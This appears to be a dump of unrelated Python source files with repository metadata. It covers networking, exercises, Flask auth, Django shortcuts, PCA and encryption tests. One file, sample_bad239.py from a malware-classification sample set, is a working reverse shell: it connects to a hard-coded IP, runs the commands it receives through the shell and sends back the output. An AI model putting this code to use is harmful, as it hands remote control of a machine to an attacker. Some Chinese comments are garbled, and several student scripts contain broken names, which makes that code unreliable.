#!/usr/bin/env python3
# -*- encoding = utf-8 -*-
# ่ฏฅไปฃ็ ็ฑๆฌไบบๅญฆไน ๆถ็ผๅ๏ผไป
ไพ่ชๅจฑ่ชไน๏ผ
# ๆฌไบบQQ๏ผ1945962391
# ๆฌข่ฟ็่จ่ฎจ่ฎบ๏ผๅ
ฑๅๅญฆไน ่ฟๆญฅ๏ผ
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
def __init__(self, srcip, dstip, qua=1):
self.srcip = srcip
self.ip = dstip
self.qua = qua
self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
# def src(self, srcip):
# self.srcip = srcip
# self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
def ping(self):
for x in range(self.qua):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print(self.ip, 'ๅฏ่พพ๏ผ')
else:
print(self.ip, 'ไธๅฏ่พพ๏ผ')
|
[
"[email protected]"
] | |
815daa7a085d07da2383291fdfe140fe3de24d40
|
667f153e47aec4ea345ea87591bc4f5d305b10bf
|
/Solutions/Ch1Ex005.py
|
0a2cd702fe7a62a4875fa2674961e86c12ac5580
|
[] |
no_license
|
Parshwa-P3/ThePythonWorkbook-Solutions
|
feb498783d05d0b4e5cbc6cd5961dd1e611f5f52
|
5694cb52e9e9eac2ab14b1a3dcb462cff8501393
|
refs/heads/master
| 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 |
Python
|
UTF-8
|
Python
| false | false | 342 |
py
|
# Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
lessThan1 = int(input("Less than 1 L: "))
moreThan1 = int(input("More than 1 L: "))
refund = (0.1 * lessThan1) + (0.25 * moreThan1)
print("Refund: $" + str(refund))
if __name__ == "__main__": main()
|
[
"[email protected]"
] | |
8a4708add6cdfe447fdcca3cdccadf54add34fad
|
220f1e6f1bd604b0ce452d2337669ad72ef7c11e
|
/quiz.py
|
a002fa0a884bdd8c7e27d8c73631451a5e2cfbde
|
[] |
no_license
|
bikashlama541/RoomA
|
9545fa75cf0f02ef4022b692de366423b27d906d
|
a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1
|
refs/heads/master
| 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 |
Python
|
UTF-8
|
Python
| false | false | 547 |
py
|
class Question:
def __init__(self, prompt, answer):
self.prompt = prompt
self.answer = answer
questions_prompts = [
"What colors are apple?\n (a) Red/Green\n (b) Orange",
"What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "b"),
]
def run_quiz(questions):
score = 0
for question in questions:
answer = inputer(question.prompt)
if answer == question.answer:
score +=1
print("You got", score, "out of", len(questions))
run_quiz(questions)
|
[
"[email protected]"
] | |
4cce4300cd93c522062d17864b7d7b6579a90919
|
eaeb685d13ef6c58364c5497c911f3e2f8c49a43
|
/Solution/520_Detect_Capital.py
|
72853824378aa294f92113350b1c6fc2394d75c7
|
[] |
no_license
|
raririn/LeetCodePractice
|
8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64
|
48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03
|
refs/heads/master
| 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 448 |
py
|
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper() or word.islower():
return True
elif word[1:].islower() and wprd[0].isupper():
return True
else:
return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
'''
|
[
"[email protected]"
] | |
5f67ab5c03e5c44dd8eafab1df10221c656733c3
|
3a60b8935f809e300405214a66d949f0042e7e46
|
/src/game/logic/player_control/player_control.py
|
01107f77ef3e00a355c7b889bb6556490849130a
|
[] |
no_license
|
stellarlib/centaurus
|
e71fe5c98b94e8e575d00e32f55ba39fe71799e6
|
896ae73165f3f44dfb87378ef2635d447ccbccae
|
refs/heads/master
| 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,929 |
py
|
from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
STD = 0
RANGED = 1
JUMP = 2
CHARGE = 3
str_to_enum = {
'std': STD,
'ranged': RANGED,
'jump': JUMP,
'charge': CHARGE,
}
action_cost = {
STD: MOVE_COST,
RANGED: RANGED_COST,
JUMP: JUMP_COST,
CHARGE: CHARGE_COST
}
def __init__(self, logic):
self.game = logic.game
self.logic = logic
cls = PlayerControl
self.mode = cls.STD
self.controls = {
cls.STD: StandardControl(self),
cls.RANGED: RangedControl(self),
cls.JUMP: JumpControl(self),
cls.CHARGE: ChargeControl(self)
}
self._player_turn = True
self._animating = False
@property
def player(self):
return self.logic.player
@property
def active(self):
return self._player_turn and not self._animating
@property
def button_map(self):
return self.game.buttons
#####################
# Routing input #
#################
def switch_mode(self, mode_name):
# this models the panel of buttons where the player toggles between action types
cls = PlayerControl
mode = cls.str_to_enum[mode_name]
if self.mode == mode:
self.mode = cls.STD
#print('switched to standard mode')
self.reset_mode_panel()
else:
cost = cls.action_cost[mode]
if cost > self.player.actions:
#print("can't switch to ", mode_name, " mode - insufficient player actions")
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
else:
self.mode = mode
self.controls[self.mode].init_mode()
# print('switched to ', mode_name, ' mode')
self.reset_mode_panel()
if mode_name != 'std':
button = self.button_map.get_button_by_id(mode_name)
button.button_down()
def reset_mode_panel(self):
[button.button_up() for button in self.button_map.get_button_group('action_mode')]
def handle_click(self, pos):
if self.active:
self.controls[self.mode].handle_click(pos)
def manual_switch_mode(self, mode_name):
if self.active:
self.switch_mode(mode_name)
else:
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
def manual_turn_end(self):
if self.active:
self.rest()
button = self.button_map.get_button_by_id('skip')
button.button_down()
def start_animating(self):
self._animating = True
def end_animating(self):
self._animating = False
##########################################################
# Player controls
####################
def move_player(self, pos):
def resolve_func():
self.spend_action(MOVE_COST)
self.end_animating()
self.start_animating()
self.player.start_move(pos, resolve_func)
def player_exits_level(self, pos):
def resolve_func():
self.end_animating()
self.player.travel_component.travel_to_next_level(pos)
# get next level according to pos
# get the new player pos on that level
# start the new level, put player in new pos
# refresh the turn so it is player start turn, full AP
self.start_animating()
self.player.start_exit_move(pos, resolve_func)
def jump_player(self, pos):
def resolve_func():
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump(pos, resolve_func)
def player_jump_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
def resolve_func():
self.player.melee_attack(foe)
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump_attack(pos, resolve_func)
def player_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(MELEE_COST)
self.end_animating()
self.start_animating()
self.player.start_melee_attack(foe, resolve_func)
def player_ranged_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(RANGED_COST)
self.end_animating()
self.player.start_ranged_attack(pos, resolve_func)
def charge_player(self, charge_path):
def resolve_func():
self.spend_action(CHARGE_COST)
self.end_animating()
self.start_animating()
self.player.start_charge(charge_path, resolve_func)
###################################################
# Game Logic #
##############
def spend_action(self, x):
self.switch_mode('std')
assert x <= self.player.actions
self.player.spend_actions(x)
if self.player.actions == 0:
self.end_turn()
def start_player_turn(self):
self._player_turn = True
self.set_up_turn()
def set_up_turn(self):
self.player.restore(2)
def tear_down_turn(self):
print('player turn over')
self.logic.start_ai_turn()
def end_turn(self):
self.tear_down_turn()
self._player_turn = False
def rest(self):
self.player.restore(1)
self.end_turn()
|
[
"[email protected]"
] | |
884cc588e8613418d6e38335716aadf8320bf7d1
|
f1ad2ff0061f67540ae0723a65c6e1238e9ca77f
|
/brainminer/base/api.py
|
9ab5865150d1a9442943b8b3293af060688cb8c7
|
[] |
no_license
|
rbrecheisen/brainminer
|
efb89b0d804196a7875fadd3491a9cb7e6cb0428
|
2f5d7bd53ba4761af1f67fa7bd16e2c6724feb7d
|
refs/heads/master
| 2021-01-20T19:08:42.447425 | 2017-06-22T08:28:57 | 2017-06-22T08:28:57 | 34,522,617 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,737 |
py
|
from flask import g, Response
from flask_restful import Resource, HTTPException, abort
from brainminer.auth.exceptions import (
MissingAuthorizationHeaderException, UserNotFoundException, UserNotActiveException, InvalidPasswordException,
SecretKeyNotFoundException, SecretKeyInvalidException, TokenDecodingFailedException, PermissionDeniedException,
UserNotSuperUserException, UserNotAdminException)
from brainminer.auth.authentication import check_login, check_token
from brainminer.auth.permissions import has_permission, check_permission, check_admin, check_superuser
# ----------------------------------------------------------------------------------------------------------------------
class BaseResource(Resource):
# def dispatch_request(self, *args, **kwargs):
#
# code = 400
#
# try:
# return super(BaseResource, self).dispatch_request(*args, **kwargs)
# except HTTPException as e:
# message = e.data['message']
# code = e.code
# except Exception as e:
# message = e.message
#
# if message is not None:
# print('[ERROR] {}.dispatch_request() {}'.format(self.__class__.__name__, message))
# abort(code, message=message)
@staticmethod
def config():
return g.config
@staticmethod
def db_session():
return g.db_session
@staticmethod
def current_user():
return g.current_user
# ----------------------------------------------------------------------------------------------------------------------
class HtmlResource(BaseResource):
@staticmethod
def output_html(data, code, headers=None):
resp = Response(data, mimetype='text/html', headers=headers)
resp.status_code = code
return resp
# ----------------------------------------------------------------------------------------------------------------------
class LoginProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_login()
except MissingAuthorizationHeaderException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
except InvalidPasswordException as e:
message = e.message
if message is not None:
print('[ERROR] LoginProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(LoginProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class TokenProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_token()
except MissingAuthorizationHeaderException as e:
message = e.message
except SecretKeyNotFoundException as e:
message = e.message
except SecretKeyInvalidException as e:
message = e.message
except TokenDecodingFailedException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
if message is not None:
print('[ERROR] TokenProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(TokenProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class PermissionProtectedResource(TokenProtectedResource):
def check_admin(self):
try:
check_superuser(self.current_user())
except UserNotSuperUserException:
try:
check_admin(self.current_user())
except UserNotAdminException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def check_permission(self, permission):
try:
check_permission(self.current_user(), permission)
except PermissionDeniedException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def has_permission(self, permission):
return has_permission(self.current_user(), permission)
|
[
"[email protected]"
] | |
89e8c2862eb94d0971d240632f6c974a62b9c46d
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5658282861527040_0/Python/xsot/b.py
|
837b18be5ec2789529bff938d391f3cd34053ff6
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 255 |
py
|
๏ปฟfor TC in range(1, int(raw_input()) + 1):
a, b, k = map(int, raw_input().split())
ans = 0
for i in range(a):
for j in range(b):
if i&j < k:
ans += 1
print "Case #%d: %d" % (TC, ans)
|
[
"[email protected]"
] | |
0682516f2179e263d15d82dac220ebb9ffc32e3a
|
575d197af5bbc31b89df37f8733e81707294948c
|
/testing/examples/pytest/average02/average.py
|
7712c0b8238a9ff4df9a5ca62e89b42e9e85eee6
|
[] |
no_license
|
tisnik/python-programming-courses
|
5c7f1ca9cae07a5f99dd8ade2311edb30dc3e088
|
4e61221b2a33c19fccb500eb5c8cdb49f5b603c6
|
refs/heads/master
| 2022-05-13T07:51:41.138030 | 2022-05-05T15:37:39 | 2022-05-05T15:37:39 | 135,132,128 | 3 | 2 | null | 2021-04-06T12:19:16 | 2018-05-28T08:27:19 |
Python
|
UTF-8
|
Python
| false | false | 158 |
py
|
"""Vรฝpoฤet prลฏmฤru."""
def average(x):
"""Vรฝpoฤet prลฏmฤru ze seznamu hodnot pลedanรฝch v parametru x."""
return sum(x) / float(1 + len(x))
|
[
"[email protected]"
] | |
4d0dac39959fe9af6b0ac34deb4b198a2b0eb6eb
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad239.py
|
a5aa6c4e78002837e16dae145993a43d6d06ef7e
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
py
|
import socket
import lzma
import subprocess
import crypt
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
|
[
"[email protected]"
] | |
54c53c759cd37e22b3b3f9b8db78a68f122b8701
|
e0660d7a6125bece559e1564921dd29fe0f1506c
|
/hexlistserver/forms/textarea.py
|
a1f2ae9adcfe4d66835f2d99a080a495476c179d
|
[] |
no_license
|
yvan/hexlistserver
|
ba0b661941549cfce1d5fd5a36ad908a9872238a
|
cf96508bc7b926eba469629254e4b5cc81470af3
|
refs/heads/master
| 2021-01-19T10:08:32.833174 | 2017-08-04T03:46:29 | 2017-08-04T03:46:29 | 55,884,098 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 294 |
py
|
from flask.ext.wtf import Form
from wtforms.fields import TextAreaField, SubmitField
from wtforms.validators import DataRequired
class TextareaForm(Form):
links = TextAreaField('Links', validators=[DataRequired()], render_kw={"placeholder": "Put your links here..."})
'''
author @yvan
'''
|
[
"[email protected]"
] | |
f8146ab2ae40e6fc2848bac16c862804609f2c02
|
e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0
|
/venv/lib/python3.5/site-packages/eventlet/zipkin/http.py
|
668c3f9e380a1d9abd740ffae72959c8b26fde56
|
[
"MIT"
] |
permissive
|
LavanyaRamkumar/Networking-app_Dynamic-Quiz
|
4d5540088b1e2724626dda8df0fd83442391b40f
|
4de8329845712864d3cc8e8b81cfce5a1207224d
|
refs/heads/master
| 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 |
MIT
| 2023-02-02T04:48:55 | 2019-03-01T16:56:13 |
Python
|
UTF-8
|
Python
| false | false | 1,789 |
py
|
import warnings
from eventlet.support import six
from eventlet.green import httplib
from eventlet.zipkin import api
# see https://twitter.github.io/zipkin/Instrumenting.html
HDR_TRACE_ID = 'X-B3-TraceId'
HDR_SPAN_ID = 'X-B3-SpanId'
HDR_PARENT_SPAN_ID = 'X-B3-ParentSpanId'
HDR_SAMPLED = 'X-B3-Sampled'
if six.PY2:
__org_endheaders__ = httplib.HTTPConnection.endheaders
__org_begin__ = httplib.HTTPResponse.begin
def _patched_endheaders(self):
if api.is_tracing():
trace_data = api.get_trace_data()
new_span_id = api.generate_span_id()
self.putheader(HDR_TRACE_ID, hex_str(trace_data.trace_id))
self.putheader(HDR_SPAN_ID, hex_str(new_span_id))
self.putheader(HDR_PARENT_SPAN_ID, hex_str(trace_data.span_id))
self.putheader(HDR_SAMPLED, int(trace_data.sampled))
api.put_annotation('Client Send')
__org_endheaders__(self)
def _patched_begin(self):
__org_begin__(self)
if api.is_tracing():
api.put_annotation('Client Recv (%s)' % self.status)
def patch():
if six.PY2:
httplib.HTTPConnection.endheaders = _patched_endheaders
httplib.HTTPResponse.begin = _patched_begin
if six.PY3:
warnings.warn("Since current Python thrift release \
doesn't support Python 3, eventlet.zipkin.http \
doesn't also support Python 3 (http.client)")
def unpatch():
if six.PY2:
httplib.HTTPConnection.endheaders = __org_endheaders__
httplib.HTTPResponse.begin = __org_begin__
if six.PY3:
pass
def hex_str(n):
"""
Thrift uses a binary representation of trace and span ids
HTTP headers use a hexadecimal representation of the same
"""
return '%0.16x' % (n,)
|
[
"[email protected]"
] | |
be328f37bac951c2c72b62235422e71d7b99017c
|
a2fae6522c0526e81032d700e750dbc4b55e308b
|
/twemoir/lib/states2/__init__.py
|
ad34e59f727359c8bb1bafd873c6013ba561029b
|
[
"BSD-2-Clause"
] |
permissive
|
fish2000/django-twemoir
|
e895039e4ecd0a01baa9e35002fe0e00e20f6a4f
|
8caa7e5319055f54e0d89457780605994622e8d9
|
refs/heads/master
| 2020-06-05T13:16:47.036385 | 2014-01-21T02:42:30 | 2014-01-21T02:42:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 601 |
py
|
'''
State engine for django models.
Define a state graph for a model and remember the state of each object.
State transitions can be logged for objects.
'''
#: The version list
VERSION = (1, 4, 4)
def get_version():
'''
Converts the :attr:`VERSION` into a nice string
'''
if len(VERSION) > 3 and VERSION[3] not in ('final', ''):
return '%s.%s.%s %s' % (VERSION[0], VERSION[1], VERSION[2], VERSION[3])
else:
return '%s.%s.%s' % (VERSION[0], VERSION[1], VERSION[2])
#: The actual version number, used by python (and shown in sentry)
__version__ = get_version()
|
[
"[email protected]"
] | |
46b1e5157ab927f5cf441af52490723e1d448632
|
d452e34253561a47b974e260dabd8dcda6e750a2
|
/unsupervised_learning/0x00-dimensionality_reduction/0-pca.py
|
739e7c1866a674e0f51ec93dfdd3ee6b953d63c2
|
[] |
no_license
|
JohnCook17/holbertonschool-machine_learning
|
57fcb5b9d351826c3e3d5478b3b4fbe16cdfac9f
|
4200798bdbbe828db94e5585b62a595e3a96c3e6
|
refs/heads/master
| 2021-07-07T10:16:21.583107 | 2021-04-11T20:38:33 | 2021-04-11T20:38:33 | 255,424,823 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 513 |
py
|
#!/usr/bin/env python3
"""PCA of an array to reduce the number of features"""
import numpy as np
def pca(X, var=0.95):
"""performs pca on a matrix"""
W, V = np.linalg.eig(np.matmul(X.T, X))
W_idx = W.argsort()[::-1]
V = V[:, W_idx]
# print(V)
V_var = np.copy(V)
V_var *= 1 / np.abs(V_var).max()
# print(V_var)
V_idx = V[np.where(np.abs(V_var) >= var, True, False)]
# print(V_idx.shape)
V_idx = len(V_idx)
# print(V[:, :V_idx].shape)
return V[:, :V_idx] * -1.
|
[
"[email protected]"
] | |
46c61bb76012d57e00ff1f1e762fe9ef6c1731eb
|
95fd6bb4126edbd36a79ba87b8cb4f0e2149e4e1
|
/tests/test_pyca.py
|
bdab377dc1090dbe408f12da0b97db5995796cc4
|
[
"MIT"
] |
permissive
|
secondguard/secondguard-python
|
a091357932ffa55e0bae74149c552781d87a3493
|
392d33ee40a9982ad912210152f4b2d44fa5ef1a
|
refs/heads/master
| 2022-12-10T11:31:31.972938 | 2020-08-04T16:23:47 | 2020-08-04T16:23:47 | 277,826,214 | 6 | 1 |
MIT
| 2022-12-08T11:05:21 | 2020-07-07T13:36:49 |
Python
|
UTF-8
|
Python
| false | false | 1,416 |
py
|
from base64 import b64decode
from os import urandom
from secondguard.pyca import (
symmetric_encrypt,
symmetric_decrypt,
asymmetric_encrypt,
asymmetric_decrypt,
)
# TODO: move to a setup class?
from tests.utils import PUBKEY_STR, PRIVKEY_STR, _fetch_testing_pubkey
# TODO: come up with less HACKey way to test many times
# TODO: add static decrypt test vectors
def perform_symmetric_encryption_decryption(num_bytes=1000):
secret = urandom(num_bytes)
ciphertext, key = symmetric_encrypt(secret)
recovered_secret = symmetric_decrypt(ciphertext=ciphertext, key=key)
assert secret == recovered_secret
def test_symmetric(cnt=100):
for attempt in range(cnt):
perform_symmetric_encryption_decryption(num_bytes=attempt * 100)
def perform_asymmetric_encryption_decryption(rsa_privkey, rsa_pubkey, secret):
ciphertext_b64 = asymmetric_encrypt(bytes_to_encrypt=secret, rsa_pubkey=PUBKEY_STR)
assert len(b64decode(ciphertext_b64)) == 512
recovered_secret = asymmetric_decrypt(
ciphertext_b64=ciphertext_b64, rsa_privkey=PRIVKEY_STR
)
assert secret == recovered_secret
def test_asymmetric(cnt=10):
for _ in range(cnt):
# This represents the info you're trying to protect:
secret = urandom(64)
perform_asymmetric_encryption_decryption(
rsa_privkey=PRIVKEY_STR, rsa_pubkey=PUBKEY_STR, secret=secret
)
|
[
"[email protected]"
] | |
52cd7955d3433c7db048edb55152a09ae1c047f1
|
d1a380bbf6e290edbb1b6ac62d4d9f8c0c8f80f1
|
/django_shorts.py
|
e3ea9f278376d6929fb2db1515603b5ce78a2d0f
|
[
"MIT"
] |
permissive
|
mhadiahmed/django-shorts
|
6310bf12812fab2bd4283e50ec57416b473eeff4
|
3803992455bda14e7f20327d22583c6d064fe0aa
|
refs/heads/main
| 2023-03-17T10:11:09.655564 | 2021-03-07T09:49:28 | 2021-03-07T09:49:28 | 345,284,896 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,096 |
py
|
#!/usr/bin/env python
import os
import sys
from subprocess import call
ALIASES = {
# Django
'c' : 'collectstatic',
'r' : 'runserver',
'sd' : 'syncdb',
'sp' : 'startproject',
'sa' : 'startapp',
't' : 'test',
# Shell
'd' : 'dbshell',
's' : 'shell',
# Auth
'csu': 'createsuperuser',
'cpw': 'changepassword',
# South
'm' : 'migrate',
'mkm' : 'makemigrations',
# session
'cs' : 'clearsessions',
# # Haystack
# 'ix' : 'update_index',
# 'rix': 'rebuild_index',
# # Django Extensions
# 'sk' : 'generate_secret_key',
# 'rdb': 'reset_db',
# 'rp' : 'runserver_plus',
# 'shp': 'shell_plus',
# 'url': 'show_urls',
# 'gm' : 'graph_models',
# 'rs' : 'runscript'
}
def run(command=None, *arguments):
"""
Run the given command.
Parameters:
:param command: A string describing a command.
:param arguments: A list of strings describing arguments to the command.
"""
if command is None:
sys.exit('django-shorts: No argument was supplied, please specify one.')
if command in ALIASES:
command = ALIASES[command]
if command == 'startproject':
return call('django-admin.py startproject {}'.format(' '.join(arguments)), shell=True)
script_path = os.getcwd()
while not os.path.exists(os.path.join(script_path, 'manage.py')):
base_dir = os.path.dirname(script_path)
if base_dir != script_path:
script_path = base_dir
else:
sys.exit('django-shorts: No \'manage.py\' script found in this directory or its parents.')
a = {
'python': sys.executable,
'script_path': os.path.join(script_path, 'manage.py'),
'command': command or '',
'arguments': ' '.join(arguments)
}
return call('{python} {script_path} {command} {arguments}'.format(**a), shell=True)
def main():
"""Entry-point function."""
try:
sys.exit(run(*sys.argv[1:]))
except KeyboardInterrupt:
sys.exit()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f6b28f22787ec511d9b652e833c2e15d3cb09928
|
275e770eaf9708e31d50dd62857fc52716e985af
|
/python/python/widget/oval progam.py
|
ff91cbe45a3d2fcd1111dcb9c0ae22b635ba724c
|
[
"MIT"
] |
permissive
|
priyamshah112/Basic_Python
|
75127744a6a25c72d2eba8e399e920509bd17ee2
|
11447cf062209de750fbe938402d738b1a5ff76c
|
refs/heads/master
| 2021-10-10T15:43:50.151891 | 2019-01-13T13:46:40 | 2019-01-13T13:46:40 | 106,164,530 | 0 | 0 | null | 2018-10-10T19:07:16 | 2017-10-08T09:31:29 |
Python
|
UTF-8
|
Python
| false | false | 182 |
py
|
from tkinter import *
canvas_width = 190
canvas_height =150
master = Tk()
w = Canvas(master,width=canvas_width,height=canvas_height)
w.pack()
w.create_oval(50,50,100,100)
mainloop()
|
[
"[email protected]"
] | |
2c161ca9efa8d4b256b9cbf48c804dc8659b5b10
|
1086ef8bcd54d4417175a4a77e5d63b53a47c8cf
|
/Forks/uvapy-master/geometry/p10005.py
|
22919427968cb78efca83f85a7629ab024461bf1
|
[
"MIT"
] |
permissive
|
wisdomtohe/CompetitiveProgramming
|
b883da6380f56af0c2625318deed3529cb0838f6
|
a20bfea8a2fd539382a100d843fb91126ab5ad34
|
refs/heads/master
| 2022-12-18T17:33:48.399350 | 2020-09-25T02:24:41 | 2020-09-25T02:24:41 | 298,446,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,600 |
py
|
from math import isclose
class Circle:
def __init__(self, **kwargs):
if "p1" in kwargs and "p2" in kwargs and "p3" in kwargs:
self.from_three_points(kwargs["p1"], kwargs["p2"], kwargs["p3"])
# elif "c" in kwargs and "r" in kwargs:
# self.from_center_radius(kwargs["c"], kwargs["r"])
else:
raise ValueError("Unknown constructor called: {}".format(kwargs.keys()))
def from_three_points(self, p1, p2, p3):
if isclose(p1.x, p2.x):
p3, p1= p1, p3
mr = (p2.y-p1.y) / (p2.x-p1.x)
if isclose(p2.x, p3.x):
p1, p2= p2, p1
mt = (p3.y-p2.y) / (p3.x-p2.x)
if isclose(mr, mt):
raise ValueError("No such circle exists.")
x = (mr*mt*(p3.y-p1.y) + mr*(p2.x+p3.x) - mt*(p1.x+p2.x)) / (2*(mr-mt))
y = (p1.y+p2.y)/2 - (x - (p1.x+p2.x)/2) / mr
radius = pow((pow((p2.x-x), 2) + pow((p2.y-y), 2)), 0.5)
self.c = (x, y)
self.r = radius
while True:
n = int(input())
if n == 0:
break
points = []
for i in range(n):
p = tuple(map(int, input().split()))
points.append(p)
r = float(input())
if n == 1:
# Always feasible to embed a point in a circle (r == 0?)
print("The polygon can be packed in the circle.")
elif n == 2:
dist_l2 = (points[1][0] - points[0][0]) ** 2 + (points[1][1] - points[0][1])**2
if dist_l2 <= (r+r)**2:
print("The polygon can be packed in the circle.")
else:
print("There is no way of packing that polygon.")
else:
# Find a circle that passes through first three points
c = Circle(p1 = points[0], p2 = points[1], p3 = points[2])
|
[
"[email protected]"
] | |
1336aaa3cf00acaea477d1715361e818158c5ce9
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/TAhuay457cw5AekBe_5.py
|
91d14e284af645ac11d85fa441299abdbfccac66
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 341 |
py
|
from re import sub
vowels = {"a", "e", "i", "o", "u", "A", "E", "I", "O", "U"}
def monkey_talk(txt):
return "{}.".format(sub(r"^[eo]", lambda m: m.group().upper(),
sub(r"[A-Za-z]+",
lambda m: "eek" if m.group()[0] in vowels
else "ook", txt)))
|
[
"[email protected]"
] | |
1cedde77ae394ba32a9d083fb8ec824a480ef2c5
|
6974096eaf642a1c3dfbc4567d0f0776621261de
|
/setup.py
|
2eea792aa201ef462b7a712aa3ca336ef13a4f22
|
[
"Apache-2.0"
] |
permissive
|
thrrgilag/pantalaimon
|
29709e1231db7655e57685babad27094f68afe5c
|
d388a21b9b1f17b7f52790f79dd571d8e75a4543
|
refs/heads/master
| 2022-11-13T12:56:14.747072 | 2020-07-02T10:19:59 | 2020-07-02T10:19:59 | 277,380,106 | 0 | 0 |
Apache-2.0
| 2020-07-05T20:41:57 | 2020-07-05T20:41:56 | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
with open("README.md", encoding="utf-8") as f:
long_description = f.read()
setup(
name="pantalaimon",
version="0.6.5",
url="https://github.com/matrix-org/pantalaimon",
author="The Matrix.org Team",
author_email="[email protected]",
description=("A Matrix proxy daemon that adds E2E encryption "
"capabilities."),
long_description=long_description,
long_description_content_type="text/markdown",
license="Apache License, Version 2.0",
packages=find_packages(),
install_requires=[
"attrs >= 19.3.0",
"aiohttp >= 3.6, < 4.0",
"appdirs >= 1.4.4",
"click >= 7.1.2",
"keyring >= 21.2.1",
"logbook >= 1.5.3",
"peewee >= 3.13.1",
"janus >= 0.5",
"cachetools >= 3.0.0"
"prompt_toolkit>2<4",
"typing;python_version<'3.5'",
"matrix-nio[e2e] >= 0.14, < 0.15"
],
extras_require={
"ui": [
"dbus-python <= 1.2",
"PyGObject <= 3.36",
"pydbus <= 0.6",
"notify2 <= 0.3",
]
},
entry_points={
"console_scripts": ["pantalaimon=pantalaimon.main:main",
"panctl=pantalaimon.panctl:main"],
},
zip_safe=False
)
|
[
"[email protected]"
] | |
5699dafae03660ced229e5fb381de892c3f83a6d
|
c4f7b067dbf9efa404d446453cdf2b0839d33fe1
|
